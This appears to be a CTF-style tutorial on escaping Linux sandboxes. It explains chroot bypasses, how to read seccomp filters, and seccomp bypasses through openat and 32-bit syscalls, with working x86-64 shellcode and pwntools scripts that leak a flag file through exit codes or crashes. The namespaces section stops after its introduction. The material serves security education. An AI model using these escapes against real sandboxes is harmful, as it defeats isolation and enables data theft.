Sandboxes (chroot, seccomp & namespaces)

Escaping from sandboxed environments by exploiting the capabilities that were left open

chroot

chroot (short for Change Root) is both a command and a syscall that changes what / refers to. You give it the path of a directory that becomes the jail, and it does two things (source):

Point / to the jailed directory (e.g. /tmp/jail)
While inside the jail, ../ will not go up further than the root (/tmp/jail/.. -> /tmp/jail)

This command or syscall normally needs root permissions (specifically the CAP_SYS_CHROOT capability) to work, and can be called like this:

chroot("/tmp/jail")

Or in the shell:

$ chroot /tmp/jail

Afterward, any path starting with / is resolved inside /tmp/jail, and if your current directory is /tmp/jail, any ../ attempt stops at /tmp/jail. A common pitfall is that paths like /bin/bash, and even the dynamically linked libraries needed to spawn a shell, are also resolved inside the jail, so everything the jailed program needs has to be copied into the jail directory.
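The two rules can be captured in a simplified Python model of path resolution. This is a sketch, not the kernel's algorithm: the hypothetical `resolve` helper ignores symlinks, mount points, and permission checks, and expects `root` and `cwd` as normalized host paths without a trailing slash.

```python
import posixpath


def resolve(path: str, root: str, cwd: str) -> str:
    """Return the real host path that `path` refers to for a process whose
    root directory is `root` and whose working directory is `cwd`.

    Simplified model: no symlinks, no mounts, no permission checks.
    """
    # Absolute paths start walking at the process root, relative ones at the CWD
    current = root if path.startswith("/") else cwd
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            # '..' is only stopped when the walk is exactly at the process root
            # (dirname("/") is "/", which models '..' at the real root)
            if current != root:
                current = posixpath.dirname(current)
            continue
        current = posixpath.join(current, part)
    return current


print(resolve("/flag", "/tmp/jail", "/tmp/jail"))        # /tmp/jail/flag
print(resolve("../../flag", "/tmp/jail", "/tmp/jail"))   # /tmp/jail/flag
print(resolve("../../flag", "/tmp/jail", "/home/user"))  # /flag (CWD outside the jail)
```

The last call already hints at the bypasses below: when the working directory is not inside the jail, the walk never reaches the jail root, so `..` is never stopped.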

Importantly, what it does not do is:

Close existing resources (file descriptors)
Change the current working directory into the jail

It is not intended to be a security measure, as it is very limited in what it does, and many tricks can get past its protections, as will be explained in the following section.

Bypasses

Current directory still outside `chroot()`

One simple problem is a program that calls chroot() but never changes its current directory into the jail. Relative paths are then still resolved from the old working directory outside the jail, and ../ sequences are never stopped by the jail root. The only catch is that absolute paths starting with / are still resolved inside the jail.

$ cd /       # move to root first
$ ./program  # program might chroot() us to /tmp/jail, but forget to chdir()
# cat /flag  # attempt to access normally
/tmp/jail/flag: No such file or directory
# cat flag   # flag will be relative to CWD, so /flag is accessed
CTF{f4k3_fl4g_f0r_t3st1ng}

$ ./program  # start from anywhere outside of /tmp/jail
# cat ../../flag  # directory traversal is still possible
CTF{f4k3_fl4g_f0r_t3st1ng}
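A process can also detect this situation itself by following `..` from its current directory until the walk stops moving, then comparing where it ended with `/`. Inside a correctly set up jail the walk ends at the jail root, which is `/`; a working directory outside the jail leads to the real root instead. A minimal Python sketch (the helper name `cwd_escapes_root` is hypothetical):

```python
import os


def cwd_escapes_root(max_depth: int = 256) -> bool:
    """Return True if the current working directory lies outside the
    process root directory (e.g. chroot() was called without chdir())."""
    root = os.stat("/")
    path = "."
    for _ in range(max_depth):
        here = os.stat(path)
        parent = os.stat(os.path.join(path, ".."))
        if (here.st_dev, here.st_ino) == (parent.st_dev, parent.st_ino):
            # '..' no longer moves: we are at the process root or the real root
            return (here.st_dev, here.st_ino) != (root.st_dev, root.st_ino)
        path = os.path.join(path, "..")
    raise RuntimeError("gave up: directory tree deeper than max_depth")


print(cwd_escapes_root())  # False in a normal, unjailed shell
```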

Shellcode (Assembly - readfile.s)

.global _start
_start:
.intel_syntax noprefix
        mov rax, 2
        lea rdi, [rip+flag]
        mov rsi, 0
        syscall       # open("../../flag", O_RDONLY)
        mov rsi, rax  # use return value (fd)
        mov rax, 40
        mov rdi, 1    # STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       # sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "../../flag"

Overwrite `chroot()`

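Another big problem is that a process has only one root directory at a time: calling chroot() again simply replaces the previous jail. Only users with the CAP_SYS_CHROOT capability can call it, but if you can, escaping is trivial, even from inside the jail. Because chroot() does not change the current directory, you can chroot() into a new directory you create: your current directory is then outside the new root, and ../ traversal works again. The shell session below is schematic: the chroot(1) command only affects the command it starts (and changes into the new root first), so in practice the call has to be made from inside the jailed process, as in the shellcode that follows.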

$ ./program             # this time chroot() and chdir() are called
# cat ../../flag  # first attempt fails because ../ inside jail doesn't work
/tmp/jail/flag: No such file or directory
# mkdir new_dir
# chroot new_dir        # set chroot() to a new directory you are not in
# cat ../../flag  # now ../ is not restricted
CTF{f4k3_fl4g_f0r_t3st1ng}

Shellcode (Assembly - mkdir-chroot.s)

.global _start
_start:
.intel_syntax noprefix
        mov rax, 83
        lea rdi, [rip+dir]
        mov rsi, 0777
        syscall          # mkdir("a", 0777)
        mov rax, 161
        lea rdi, [rip+dir]
        syscall          # chroot("a")

# Now the cwd is outside the new chroot

        mov rax, 2
        lea rdi, [rip+flag]
        mov rsi, 0
        syscall       # open("../../flag", O_RDONLY)
        mov rsi, rax  # use return value (fd)
        mov rax, 40
        mov rdi, 1    # STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       # sendfile(STDOUT, flag_fd, 0, 100)
dir:
        .string "a"
flag:
        .string "../../flag"

Open Resources

The last trick is to use resources that were opened outside the jail and are still available inside it. If the program opens the /flag file before being jailed, for example, you can still read from its file descriptor (usually 3, since 0, 1, and 2 are already taken by stdin, stdout, and stderr).

// === Somewhere earlier in the program ===
int fd = open("/flag", O_RDONLY);  // -> returns 3 as fd
chroot(...);
// === In the shellcode ===
// sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
sendfile(1, 3, NULL, 100);

Shellcode (Assembly - fd-sendfile.s)

.global _start
_start:
.intel_syntax noprefix
        mov rax, 40
        mov rdi, 1    # STDOUT
        mov rsi, 3    # previously open file descriptor of /flag
        mov rdx, 0
        mov r10, 100
        syscall       # sendfile(STDOUT, flag_fd, 0, 100)
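You need root to call chroot(), but the property this trick relies on is easy to observe without it: a file descriptor refers to the opened file, not to its path, so it keeps working after the path becomes unreachable. In this Python sketch, deleting the file stands in for the chroot() call (an analogy, not a real jail), and `os.sendfile` makes the same kind of copy as the shellcode, into a second file instead of stdout. The file names and flag are made up.

```python
import os
import tempfile


def read_through_old_fd() -> bytes:
    with tempfile.TemporaryDirectory() as tmp:
        flag_path = os.path.join(tmp, "flag")
        with open(flag_path, "wb") as f:
            f.write(b"CTF{f4k3_fl4g_f0r_t3st1ng}\n")

        # "Somewhere earlier in the program": the file is opened ...
        flag_fd = os.open(flag_path, os.O_RDONLY)
        # ... and then becomes unreachable by path (stand-in for chroot())
        os.unlink(flag_path)

        out_path = os.path.join(tmp, "out")
        out_fd = os.open(out_path, os.O_WRONLY | os.O_CREAT, 0o600)
        try:
            # Explicit offset 0; the shellcode passes NULL, which reads from
            # the current position (also 0 for a freshly opened fd)
            os.sendfile(out_fd, flag_fd, 0, 100)
        finally:
            os.close(out_fd)
            os.close(flag_fd)

        with open(out_path, "rb") as f:
            return f.read()


print(read_through_old_fd())  # b'CTF{f4k3_fl4g_f0r_t3st1ng}\n'
```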

The same works for directories: a directory file descriptor opened outside the jail can serve as the starting point for relative paths in the ...at family of syscalls, such as openat instead of open, or fchmodat instead of chmod.

// === Somewhere earlier in the program ===
int dir = open("/any/path", O_RDONLY);  // -> returns 3 as fd
chroot(...);
// === In the shellcode ===
// openat(int dirfd, const char *pathname, int flags)
int fd = openat(3, "../../flag", O_RDONLY);  // -> returns 4 as fd
sendfile(1, fd, NULL, 100);

Shellcode (Assembly - fd-openat.s)

.global _start
_start:
.intel_syntax noprefix
        mov rax, 257
        mov rdi, 3
        lea rsi, [rip+flag]
        mov rdx, 0
        syscall       # openat("/any/path", "../../flag", O_RDONLY)
        mov rsi, rax  # return value (fd)
        mov rax, 40
        mov rdi, 1    # STDOUT
        mov rdx, 0
        mov r10, 100
        syscall       # sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "../../flag"
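Python exposes openat() through the `dir_fd` parameter of `os.open`, so path resolution from a directory fd can be tried locally. The sketch builds a made-up layout with `any/path` and `flag` inside a temporary directory and opens `../../flag` relative to the directory fd, like the openat(3, "../../flag", 0) call above. No chroot is involved, so it only shows that the path is resolved from the fd and not from the current directory.

```python
import os
import tempfile


def openat_relative() -> bytes:
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "any", "path"))
        with open(os.path.join(tmp, "flag"), "wb") as f:
            f.write(b"CTF{f4k3_fl4g_f0r_t3st1ng}\n")

        # Equivalent of open("/any/path") earlier in the program
        dir_fd = os.open(os.path.join(tmp, "any", "path"), os.O_RDONLY | os.O_DIRECTORY)
        try:
            # openat(dir_fd, "../../flag", O_RDONLY): resolved from dir_fd, not the CWD
            flag_fd = os.open("../../flag", os.O_RDONLY, dir_fd=dir_fd)
            try:
                return os.read(flag_fd, 100)
            finally:
                os.close(flag_fd)
        finally:
            os.close(dir_fd)


print(openat_relative())  # b'CTF{f4k3_fl4g_f0r_t3st1ng}\n'
```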

This last method is even more powerful when you start the program yourself from a shell (for example a SetUID binary): the shell can open a file or directory for you and hand it to the program as an already-open file descriptor, using the [n]< path redirection syntax:

$ # === same effect as above ===
$ ./program 3< /any/path
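You can confirm that the program really receives the directory as fd 3 by replaying the redirection from Python. In this sketch a Python child process plays the role of ./program: it is started through /bin/sh with `3< <dir>` and lists fd 3 with `os.listdir`, which accepts a directory file descriptor. The temporary directory and its `flag` file are made up for the example.

```python
import os
import shlex
import subprocess
import sys
import tempfile


def list_fd3_of_child() -> list:
    with tempfile.TemporaryDirectory() as tmp:
        open(os.path.join(tmp, "flag"), "w").close()
        # The child stands in for ./program and lists whatever fd 3 points to
        child = "import os; print(' '.join(sorted(os.listdir(3))))"
        # Same idea as: $ ./program 3< /any/path
        cmd = f"{shlex.quote(sys.executable)} -c {shlex.quote(child)} 3< {shlex.quote(tmp)}"
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True)
        return result.stdout.split()


print(list_fd3_of_child())  # ['flag']
```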

Using the fchdir syscall on such a directory fd, you can also move the current directory outside the chroot and use ../ directory traversal tricks again.
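A minimal Python sketch of the fchdir() step, leaving out the chroot() call itself (which needs root): keep a directory fd, move the working directory elsewhere (standing in for the jail), jump back through the fd with `os.fchdir`, and continue with plain `../` paths. The directory layout is made up.

```python
import os
import tempfile


def fchdir_then_traverse() -> bytes:
    old_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "any", "path"))
        os.makedirs(os.path.join(tmp, "jail"))
        with open(os.path.join(tmp, "flag"), "wb") as f:
            f.write(b"CTF{f4k3_fl4g_f0r_t3st1ng}\n")

        dir_fd = os.open(os.path.join(tmp, "any", "path"), os.O_RDONLY | os.O_DIRECTORY)
        try:
            os.chdir(os.path.join(tmp, "jail"))  # stand-in for sitting in the jail
            os.fchdir(dir_fd)                    # CWD is now <tmp>/any/path again
            with open("../../flag", "rb") as f:  # plain ../ traversal from there
                return f.read()
        finally:
            os.close(dir_fd)
            os.chdir(old_cwd)  # restore before the temporary directory is removed


print(fchdir_then_traverse())  # b'CTF{f4k3_fl4g_f0r_t3st1ng}\n'
```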

seccomp

Seccomp (secure computing mode), unlike chroot, is designed as a security mechanism. It is a highly customizable way to restrict which syscalls a process may make, and works much like a network firewall (it even uses the Berkeley Packet Filter, originally made for networking). You will usually see it configured as an allowlist (everything blocked except a few syscalls) or a blocklist (everything allowed except a few). Blocklists are inherently dangerous because a developer may forget a syscall with unexpected functionality, but even the syscalls in an allowlist may grant more than necessary and be exploitable.

A simple example of an allowlist using seccomp (through libseccomp) looks like this:

#include <seccomp.h>  // libseccomp, link with -lseccomp
#include <stdlib.h>   // abort()

scmp_filter_ctx ctx;  // define context variable to set up rules

// Kill the program on any syscall
ctx = seccomp_init(SCMP_ACT_KILL);
if (ctx == NULL) abort();
// ... except read (allow)
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) != 0) abort();
// ... except write (allow)
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) != 0) abort();
// load the context, rules are applied from now on
if (seccomp_load(ctx) != 0) abort();

Loading a filter is irreversible: the rules apply to all code that runs afterwards, including injected shellcode, child processes created with fork(), and programs started with execve(), but also the program's own code. The example above would even kill the program when it exits, since exit_group is not on the allowlist. Because of this, the rules must be lenient enough for the code the program legitimately needs, but not so lenient that an exploit can abuse them.

Reading the rules

A good first step in bypassing these rules is understanding them correctly. While static analysis might be enough for a simple program, a more complex one is often easier to understand through dynamic analysis. The seccomp-tools project implements handy utilities for extracting seccomp rules.

The simplest and most common command is seccomp-tools dump which takes a binary that it will run. Using ptrace it can extract the seccomp rules at runtime and print them to the console:

$ seccomp-tools dump ./binary
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x06 0xc000003e  if (A != ARCH_X86_64) goto 0008
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0005
 0004: 0x06 0x00 0x00 0x00000000  return KILL
 0005: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0007
 0006: 0x06 0x00 0x00 0x00000000  return KILL
 0007: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0009
 0008: 0x06 0x00 0x00 0x00000000  return KILL
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW

Seccomp rules are built with Berkeley Packet Filters (BPF), meaning they have instructions and code flow like assembly. This is what you see dumped and can analyze.

In the above example, the filter first checks whether the architecture is x86-64; if not, it jumps to return KILL, blocking any 32-bit syscalls. It then checks for the open, openat, and execve syscalls one by one, and kills the process if the syscall is any of those. A syscall that passes all the checks reaches return ALLOW and is executed.
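To check your reading of a dump, you can replay the filter on chosen inputs. This Python sketch interprets only the three classic BPF instructions that appear in the dump (load word, jump-if-equal, return), so it is not a general BPF implementation. It packs `struct seccomp_data` the way the kernel lays it out on x86-64 and runs the rows from the dump:

```python
import struct

# The three classic BPF opcodes used in the dump (values from linux/filter.h)
LD_W_ABS = 0x20  # A = 32-bit word at offset k of struct seccomp_data
JEQ_K = 0x15     # if A == k: skip jt instructions, else skip jf
RET_K = 0x06     # stop and return k as the seccomp action

SECCOMP_RET_KILL = 0x00000000
SECCOMP_RET_ALLOW = 0x7FFF0000
AUDIT_ARCH_X86_64 = 0xC000003E
AUDIT_ARCH_I386 = 0x40000003

# The dump as (code, jt, jf, k) rows; jump targets are pc + 1 + jt/jf
FILTER = [
    (0x20, 0, 0, 0x00000004),  # 0000: A = arch
    (0x15, 0, 6, 0xC000003E),  # 0001: if (A != ARCH_X86_64) goto 0008
    (0x20, 0, 0, 0x00000000),  # 0002: A = sys_number
    (0x15, 0, 1, 0x00000002),  # 0003: if (A != open) goto 0005
    (0x06, 0, 0, 0x00000000),  # 0004: return KILL
    (0x15, 0, 1, 0x00000101),  # 0005: if (A != openat) goto 0007
    (0x06, 0, 0, 0x00000000),  # 0006: return KILL
    (0x15, 0, 1, 0x0000003B),  # 0007: if (A != execve) goto 0009
    (0x06, 0, 0, 0x00000000),  # 0008: return KILL
    (0x06, 0, 0, 0x7FFF0000),  # 0009: return ALLOW
]


def run_filter(prog, nr, arch, args=(0, 0, 0, 0, 0, 0), ip=0):
    """Return the action `prog` takes for one syscall."""
    # struct seccomp_data { int nr; u32 arch; u64 instruction_pointer; u64 args[6]; }
    data = struct.pack("<iIQ6Q", nr, arch, ip, *args)
    acc, pc = 0, 0
    while True:
        code, jt, jf, k = prog[pc]
        if code == LD_W_ABS:
            (acc,) = struct.unpack_from("<I", data, k)
        elif code == JEQ_K:
            pc += jt if acc == k else jf
        elif code == RET_K:
            return k
        else:
            raise NotImplementedError(f"opcode {code:#x} not supported by this sketch")
        pc += 1
```

For example, `run_filter(FILTER, 437, AUDIT_ARCH_X86_64)` returns `SECCOMP_RET_ALLOW`: openat2 (437 on x86-64) is not covered by this blocklist.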

In more practical situations, the program might need some arguments or configuration before it activates its seccomp filter, so just running the binary will not reveal the rules. A simple trick for passing arguments is to create a .sh file that starts the program the way you want, and then analyze that:

$ nano start.sh          # contents of start.sh:
#!/bin/sh
./binary arg1 arg2 arg3
$ chmod +x start.sh
$ seccomp-tools dump ./start.sh
...

Lastly, you can even attach to a running process with this tool if the process is in a seccomp'ed state you would like to analyze.

$ sudo seccomp-tools dump -p 1337
$ sudo seccomp-tools dump -p `pidof binary`
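If you only need to know whether a process runs under seccomp at all, and not the rules themselves, the kernel also reports the mode in the `Seccomp:` line of `/proc/<pid>/status` (0 = disabled, 1 = strict, 2 = filter). A small Python sketch; the helper name is hypothetical, and it returns None on kernels built without seccomp support, where the line is missing. Since filters are inherited across fork() and execve(), children of a filtered process report mode 2 as well.

```python
def seccomp_mode(pid="self"):
    """Return the seccomp mode of a process from /proc/<pid>/status, or None."""
    with open(f"/proc/{pid}/status") as status:
        for line in status:
            # "Seccomp_filters:" on newer kernels does not match "Seccomp:"
            if line.startswith("Seccomp:"):
                return int(line.split()[1])
    return None


print(seccomp_mode())  # mode of this Python process
```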

Bypasses

There is no clean-cut way to "bypass" any seccomp configuration, and it really depends on what specific syscalls are allowed or denied. With that being said, there are some tricks developers might not expect that can still lead to a big impact (source).

Overly permissive policies

When common syscalls like open are blocked, the developer may have forgotten a related one. For example, openat might still be allowed, and it can do almost the same thing relative to a Directory File Descriptor (DFD). A useful constant in this case is AT_FDCWD, which has the value -100: it is a special DFD that refers to the current working directory, so it can be passed as the DFD to any of the ...at variants of syscalls.
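A Python sketch of the AT_FDCWD trick: it calls libc's `openat` through `ctypes` so that AT_FDCWD can be passed explicitly, which opens a relative path from the current directory just like open() would. It assumes Linux with a C library that exports `openat` (glibc or musl); the temporary file and flag are made up.

```python
import ctypes
import os
import tempfile

AT_FDCWD = -100  # Linux value from <fcntl.h>

libc = ctypes.CDLL(None, use_errno=True)
libc.openat.argtypes = [ctypes.c_int, ctypes.c_char_p, ctypes.c_int]
libc.openat.restype = ctypes.c_int


def openat_cwd(path: str) -> int:
    """openat(AT_FDCWD, path, O_RDONLY), i.e. the same as open(path, O_RDONLY)."""
    fd = libc.openat(AT_FDCWD, os.fsencode(path), os.O_RDONLY)
    if fd < 0:
        err = ctypes.get_errno()
        raise OSError(err, os.strerror(err), path)
    return fd


def read_flag_with_openat() -> bytes:
    old_cwd = os.getcwd()
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "flag"), "wb") as f:
            f.write(b"CTF{f4k3_fl4g_f0r_t3st1ng}\n")
        os.chdir(tmp)
        try:
            fd = openat_cwd("flag")  # relative to the CWD, like open("flag")
            try:
                return os.read(fd, 100)
            finally:
                os.close(fd)
        finally:
            os.chdir(old_cwd)


print(read_flag_with_openat())  # b'CTF{f4k3_fl4g_f0r_t3st1ng}\n'
```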

There are hundreds of syscalls, which makes a blocklist hard to get right. You can look through a table of all syscalls for one that seems interesting and is allowed, and get more information about an unfamiliar syscall from its man page in section 2 (e.g. man 2 openat).
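When auditing a blocklist, it helps to keep a list of syscalls that overlap in functionality. The table in this Python sketch is hand-picked and deliberately incomplete, with x86-64 numbers (double-check them against your target's syscall table); `still_allowed` reports which alternatives a given blocklist leaves open. Fed with the numbers blocked in the dump shown earlier (open, openat, execve), it points at openat2 and execveat:

```python
# Hand-picked, non-exhaustive groups of x86-64 syscalls with overlapping effects
ALTERNATIVES = {
    "open a file": {"open": 2, "openat": 257, "openat2": 437},
    "read a file": {"read": 0, "pread64": 17, "readv": 19, "preadv": 295, "sendfile": 40},
    "write output": {"write": 1, "pwrite64": 18, "writev": 20, "pwritev": 296, "sendfile": 40},
    "run a program": {"execve": 59, "execveat": 322},
    "change permissions": {"chmod": 90, "fchmod": 91, "fchmodat": 268},
}


def still_allowed(blocked: set) -> dict:
    """For each goal, list the syscalls from ALTERNATIVES that `blocked` misses."""
    return {
        goal: sorted(name for name, nr in calls.items() if nr not in blocked)
        for goal, calls in ALTERNATIVES.items()
    }


allowed = still_allowed({2, 257, 59})  # open, openat, execve
print(allowed["open a file"])    # ['openat2']
print(allowed["run a program"])  # ['execveat']
```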

Architecture Confusion

This is a special case. On x86-64 there are two ways to make a syscall: the syscall instruction for the 64-bit interface and int 0x80 for the 32-bit one. The syscall number is passed in rax and eax respectively, and the two interfaces use different numbers (for example, open is 2 in the 64-bit table but 5 in the 32-bit one). By default, libseccomp only accepts the native architecture and kills all 32-bit syscalls. However, in certain non-default configurations you might find 32-bit syscalls enabled and filtered more permissively than 64-bit ones. They can be enabled with the following line, after which they need their own rules, separate from the 64-bit ones:

seccomp_arch_add(ctx, SCMP_ARCH_X86);

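To exploit this, use the 32-bit syscall table and int 0x80 instructions instead of syscall. No special compilation is needed: the code below is assembled as normal 64-bit code. Note that int 0x80 only takes the lower 32 bits of each register, so pointers such as the path must lie below 4 GiB (for example in a buffer mapped at a low fixed address). Here is an example: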

32-bit.s

.intel_syntax noprefix
        mov eax, 5
        lea ebx, [rip+flag]
        mov ecx, 0
        int 0x80       # open("flag", O_RDONLY)
        mov ecx, eax   # return value (fd)
        mov eax, 187
        mov ebx, 1     # STDOUT
        mov edx, 0
        mov esi, 100
        int 0x80       # sendfile(STDOUT, flag_fd, 0, 100)
flag:
        .string "flag"
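The reason the architecture check matters is that the same number means different syscalls in the two tables. This Python sketch holds a few hand-copied entries from each table (verify them against your kernel's tables) and shows how a hand-written filter that compares only the syscall number, without checking `arch`, would misread 32-bit calls:

```python
# A few entries from each syscall table (number -> name)
X86_64 = {0: "read", 1: "write", 2: "open", 5: "fstat", 11: "munmap", 59: "execve", 187: "readahead"}
I386 = {1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open", 11: "execve", 187: "sendfile"}


def misread(nr_32: int) -> tuple:
    """Return (real i386 syscall, what an arch-blind x86-64 filter sees)."""
    return I386.get(nr_32, "?"), X86_64.get(nr_32, "?")


def passes_blocklist(nr_32: int, blocked_64: set) -> bool:
    """An arch-blind blocklist only compares the raw number."""
    return nr_32 not in blocked_64


print(misread(5))                         # ('open', 'fstat')
print(misread(11))                        # ('execve', 'munmap')
print(passes_blocklist(5, {2, 257, 59}))  # True: 32-bit open slips through
```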

Side Channels

While you might want to execute a shell using execve(), sometimes leaking secrets is enough. If you can access sensitive information but cannot send it back to yourself directly, think about possible side channels. Even 1 bit of information per attempt eventually adds up to a full secret if repeated often enough. Here are some ideas:

The exit code of the program, set with exit(), is 8 bits (0-255): in bash you can check the exit code of the previous command with the $? variable, and running a program from almost any programming language also gives you its exit code. If you are able to read it, you can exfiltrate 8 bits in one go, like one character of a string, and repeat this for each character.
The runtime of a program, similar to Blind SQL Injection (sleep(), long computation, loop): to be efficient, balance a short wait for fast attempts against a wait long enough to measure the difference confidently. This can be useful when there is really no response from the program, like in a remote setting.
Crash vs no crash: In some cases, it is obvious that a program crashed, because the application explicitly told you with an error message or simply if some expected output is missing. This can tell you 1 bit of information by either crashing or continuing execution, and the way to exploit this is similar to using the runtime of the program.
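Whichever channel you choose, the recovery loop looks the same: ask one yes/no question per bit and assemble the answers into bytes. A minimal Python sketch, assuming a hypothetical `oracle(byte_index, bit_index)` callable that returns True when that bit of the secret is 1; in a real attack it would run the program once and inspect the crash, timing, or exit code. Here a local secret stands in for the remote one:

```python
from typing import Callable


def recover(oracle: Callable[[int, int], bool], terminator: bytes = b"}", max_len: int = 128) -> bytes:
    """Rebuild a secret bit by bit from a boolean oracle, least significant bit first."""
    secret = bytearray()
    for byte_index in range(max_len):
        value = 0
        for bit_index in range(8):  # 8 questions per byte
            if oracle(byte_index, bit_index):
                value |= 1 << bit_index
        secret.append(value)
        if secret.endswith(terminator):
            break
    return bytes(secret)


# Local stand-in for the real side channel
SECRET = b"CTF{f4k3_fl4g_f0r_t3st1ng}"


def local_oracle(byte_index: int, bit_index: int) -> bool:
    return bool((SECRET[byte_index] >> bit_index) & 1)


print(recover(local_oracle))  # b'CTF{f4k3_fl4g_f0r_t3st1ng}'
```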

Using the exit code is pretty straightforward. We read the flag into memory, load one byte of it into the argument of exit(), and make the syscall. In assembly, we could leak the first byte like this:

mov rax, 0
mov rdi, 3          # "/flag" fd (already open)
lea rsi, [rsp-100]  # read onto stack
mov rdx, 100
syscall             # read(3, buf, 100)
mov rax, 60
mov rdi, [rsi+0]    # offset here is 0, increment for next byte
syscall             # exit(flag[0]), only the low 8 bits are kept

This might give exit code 67 when we check using echo $?, which is the ASCII code of C (the first character of CTF{...}). To leak the whole secret, we simply keep doing this while incrementing the offset:

Python Script (go through all bytes)

from pwn import *

elf = context.binary = ELF('./binary')

flag = b""
for i in range(100):
    # Dynamically assemble the payload for offset i
    # (assumes the binary already has /flag open as fd 3)
    payload = asm(f"""
        mov rax, 0
        mov rdi, 3
        lea rsi, [rsp-100]
        mov rdx, 100
        syscall
        mov rax, 60
        mov rdi, [rsi+{i}]  # <- insert i (offset) here
        syscall
    """)

    p = process()
    p.send(payload)

    exit_code = p.poll(True)  # Block until program exits
    p.close()

    flag += bytes([exit_code])
    print(flag)
    if flag.endswith(b"}"):  # stop at the end of the flag
        break
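The exit-code channel can be tried locally without any shellcode. In this Python sketch a child interpreter stands in for the exploited program and exits with one byte of a made-up secret, plus 256 to show that only the low 8 bits of the status survive; the parent reads the same value bash would put in $?. For brevity the sketch knows the secret's length, where a real script would stop at the closing brace.

```python
import subprocess
import sys

SECRET = b"CTF{f4k3_fl4g_f0r_t3st1ng}"


def leak_byte(offset: int) -> int:
    # The child plays the exploited program: exit(secret[offset] + 256)
    child = f"import sys; sys.exit({SECRET!r}[{offset}] + 256)"
    return subprocess.run([sys.executable, "-c", child]).returncode


def leak_all() -> bytes:
    # One process run per byte, like the pwntools loop above
    return bytes(leak_byte(i) for i in range(len(SECRET)))


print(leak_byte(0))  # 67, i.e. "C"
```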

When the exit code is not directly visible, you might be able to get a boolean response using the time or crash method. This can be implemented in various ways, but the simplest and most efficient is to take the nth bit of the secret and decide what to do depending on that bit.

To crash the program, you could read from or write to an unmapped address for a 1, and simply ret for a 0. This is nicer than a time-based result because you get an instant yes/no answer, allowing quicker and more confident extraction. To extract a single bit in assembly, first load the byte at a byte offset, then mask it with the bit you want:

    mov rax, 0
    mov rdi, 3
    lea rsi, [rsp-100]
    mov rdx, 100
    syscall
    mov al, BYTE PTR [rsi+1]  # 8a 46 01 (01 is byte placeholder)
    and al, 2                 # 24 02    (02 is bit  placeholder)
    jnz crash                 # jump depending on result
    ret
crash:
    mov QWORD PTR [rax], 0    # rax holds a small value here: a low, unmapped address

We can then dynamically change this payload to get any byte and bit we need. In a Python script we go through all the bits to slowly recover the whole secret:

Python Script (go through all bits)

from pwn import *

elf = context.binary = ELF('./binary')

PAYLOAD = asm("""
    mov rax, 0
    mov rdi, 3
    lea rsi, [rsp-100]
    mov rdx, 100
    syscall
    mov al, BYTE PTR [rsi+1]  # 8a 46 01
    and al, 2                 # 24 02
    jnz crash
    ret
crash:
    mov BYTE PTR [rax], 0
""")

def get_bit(offset):
    p = process([elf.path, '/flag'])
    byte = offset // 8
    bit = offset % 8
    
    payload = PAYLOAD  # Replace byte and bit placeholders
    payload = payload.replace(b"\x8a\x46\x01", bytes([0x8a, 0x46, byte]))
    payload = payload.replace(b"\x24\x02", bytes([0x24, 1 << bit]))

    p.send(payload)
    exit_code = p.poll(True)  # Block until exit
    p.close()
    
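    # -11 = SIGSEGV (the crash branch); -31 = SIGSYS, assumed here to be how the
    # target dies after `ret` (e.g. by making a syscall the filter blocks)
    if exit_code not in [-11, -31]: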
        return get_bit(offset)  # something unexpected happened, try again
    
    return exit_code == -11


flag = b""
binary = ""
i = 0
while not flag.endswith(b"}"):
    binary = ("1" if get_bit(i) else "0") + binary
    print(f"{binary: >8}")  # Build out byte in binary first
    
    if len(binary) == 8:  # If full byte, convert to ASCII
        flag += bytes([int(binary, 2)])
        binary = ""
        print(flag)
    
    i += 1
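The byte replacement in `get_bit` only works within the limits of those two encodings: `8a 46 XX` is `mov al, BYTE PTR [rsi+disp8]` with a signed 8-bit displacement, so byte offsets above 127 would silently become negative displacements, and `24 XX` is `and al, imm8`. A standalone sketch of that patching step with explicit checks (the helper name `patch_payload` is hypothetical; the template below contains just the placeholder instructions, `jnz`, and `ret`):

```python
MOV_AL_RSI_DISP8 = b"\x8a\x46"  # mov al, BYTE PTR [rsi+disp8]
AND_AL_IMM8 = b"\x24"           # and al, imm8


def patch_payload(template: bytes, offset: int) -> bytes:
    """Point the placeholders at bit `offset` of the secret (byte offset//8, bit offset%8)."""
    byte, bit = divmod(offset, 8)
    if not 0 <= byte <= 127:
        raise ValueError("disp8 is signed: byte offsets above 127 need another encoding")
    old_mov, new_mov = MOV_AL_RSI_DISP8 + b"\x01", MOV_AL_RSI_DISP8 + bytes([byte])
    old_and, new_and = AND_AL_IMM8 + b"\x02", AND_AL_IMM8 + bytes([1 << bit])
    # Each placeholder must occur exactly once, or the patch would hit other code
    for placeholder in (old_mov, old_and):
        if template.count(placeholder) != 1:
            raise ValueError(f"placeholder {placeholder.hex()} is not unique in the payload")
    return template.replace(old_mov, new_mov).replace(old_and, new_and)


TEMPLATE = b"\x8a\x46\x01\x24\x02\x75\x01\xc3"  # mov al,[rsi+1]; and al,2; jnz +1; ret
print(patch_payload(TEMPLATE, 47).hex())  # 8a460524807501c3 (byte 5, bit 7)
```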

Namespaces

Namespaces can get very complex, so this section does not go deep. It only shows a few simple ideas for escaping from namespaces that have specific permissive features.

